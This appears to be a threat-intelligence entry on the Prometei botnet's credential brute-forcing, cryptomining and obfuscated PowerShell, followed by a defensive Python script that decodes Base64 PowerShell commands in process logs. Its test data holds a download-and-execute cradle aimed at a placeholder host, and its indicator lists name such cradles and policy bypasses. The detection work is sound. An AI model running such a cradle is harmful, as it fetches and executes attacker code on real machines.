Type: Campaign
Actors:
Pub. date: October 23, 2024
Initial access: 1-day vulnerability, Password attack
Impact: Resource hijacking
Observed techniques:
Observed tools:
Status: Finalized
Last edited: Nov 14, 2024 1:35 PM
The Prometei botnet attempted to infiltrate a company’s network using a brute-force attack. Trend Micro researchers identified and mitigated the threat by unpacking Prometei’s stealthy, modular structure. Prometei is built primarily for cryptocurrency mining and credential theft. It spreads quickly across a network by brute-forcing credentials and exploiting known (1-day) vulnerabilities in exposed services such as RDP and SMB, and it uses PowerShell scripts both to evade detection and to persist across reboots.
The investigation revealed Prometei’s layered evasion and resilience tactics: a Domain Generation Algorithm (DGA) that derives C&C domains dynamically instead of relying on hard-coded addresses, encrypted payloads, and PowerShell commands obfuscated with Base64 encoding. Analysis points to Russian-speaking threat actors, in part because the malware avoids targeting Russian systems.
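As an added illustration of the Base64-obfuscated PowerShell that both paragraphs above mention (this is example detection code written for this page, not code from Trend Micro’s report or from Prometei itself), the script below decodes `-EncodedCommand` payloads from process-creation log lines and flags common quiet-execution switches and download cradles in the decoded text. The pipe-separated log layout, the user names, the `example.invalid` URL and the indicator lists are assumptions made for illustration; the log lines are constructed, not captured.

```python
"""Decode and flag Base64-encoded PowerShell in process-creation logs.

Added example, not from the Trend Micro report or from Prometei. The log
lines are constructed; the "user | image | command line" layout stands in
for a simplified Windows Security 4688 / Sysmon event 1 export (assumption).
"""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, ...), so match every prefix rather than the full switch.
# The payload may follow as the next token or be glued on with ':'.
_SWITCH = "encodedcommand"
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:"
    + "|".join(_SWITCH[:i] for i in range(1, len(_SWITCH) + 1))
    + r")(?:\s+|:)([A-Za-z0-9+/=]+)"
)

# Switches commonly used to run a script quietly (generic, not Prometei-specific).
CMDLINE_INDICATORS = {
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "bypass-policy": re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"),
}

# Patterns checked inside the decoded script.
SCRIPT_INDICATORS = {
    "download-cradle": re.compile(
        r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
    ),
    "invoke-expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "nested-base64": re.compile(r"(?i)FromBase64String"),
}


def encode_powershell(script: str) -> str:
    """Build the payload powershell.exe expects: UTF-16LE text, Base64-encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str):
    """Return the decoded script, or None when the payload is not valid
    Base64 / UTF-16LE (malformed payloads are still worth surfacing)."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:  # UTF-16 needs an even byte count
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def parse_line(line: str) -> dict:
    """Split a constructed 'user | image | command line' record."""
    user, image, cmdline = (part.strip() for part in line.split("|", 2))
    return {"user": user, "image": image, "cmdline": cmdline}


def triage(lines):
    """Return one finding per line that carries an encoded command."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        match = ENCODED_FLAG.search(ev["cmdline"])
        if not match:
            continue
        decoded = decode_encoded_command(match.group(1))
        hits = [n for n, rx in CMDLINE_INDICATORS.items() if rx.search(ev["cmdline"])]
        if decoded is None:
            hits.append("undecodable-payload")
        else:
            hits += [n for n, rx in SCRIPT_INDICATORS.items() if rx.search(decoded)]
        findings.append({"user": ev["user"], "decoded": decoded, "indicators": sorted(hits)})
    return findings


# Constructed sample data (hypothetical hosts, users and URL).
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
)
ENCODED_SAMPLE = encode_powershell(SAMPLE_SCRIPT)
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOG_LINES = [
    # benign: an administrator listing services
    r"CORP\admin | " + PS_IMAGE + " | powershell.exe Get-Service",
    # suspicious: hidden window, no profile, encoded download cradle
    r"CORP\svc_backup | " + PS_IMAGE + " | powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE,
    # malformed payload after the switch (bad Base64 padding): still reported
    r"CORP\svc_backup | " + PS_IMAGE + " | powershell.exe -EncodedCommand ZGlyCg",
]

if __name__ == "__main__":
    for f in triage(LOG_LINES):
        print(f["user"], f["indicators"], (f["decoded"] or "")[:60])
```

Running the block against a real export is a matter of replacing `LOG_LINES` with the command-line field of 4688 or Sysmon events; the decoder deliberately treats an undecodable payload as a finding rather than dropping it, because a truncated or deliberately mangled Base64 string after `-enc` is itself unusual.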